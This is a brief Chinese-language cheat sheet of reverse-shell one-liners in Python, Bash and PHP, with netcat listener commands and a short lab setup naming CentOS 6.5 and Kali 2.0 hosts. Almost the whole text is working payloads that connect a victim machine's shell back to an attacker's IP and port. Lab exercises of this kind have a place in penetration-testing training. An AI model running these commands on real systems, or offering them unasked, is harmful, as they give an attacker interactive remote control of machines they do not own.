常用
python
/usr/bin/python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.226.130",9999));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
bash
/bin/bash -i >& /dev/tcp/192.168.1.1/9999 0>&1
php
php -r '$sock=fsockopen("ip",port);exec("/bin/bash -i <&3 >&3 2>&3");'
nc接收端
nc -lvnp -{port}
实验环境
CentOS 6.5:192.168.0.3
kali2.0:192.168.0.4
方法1:
反弹shell命令如下:
/bin/bash -i >& /dev/tcp/192.168.1.1/9999 0>&1
首先,使用nc在kali上监听端口:
nc -lvp 7777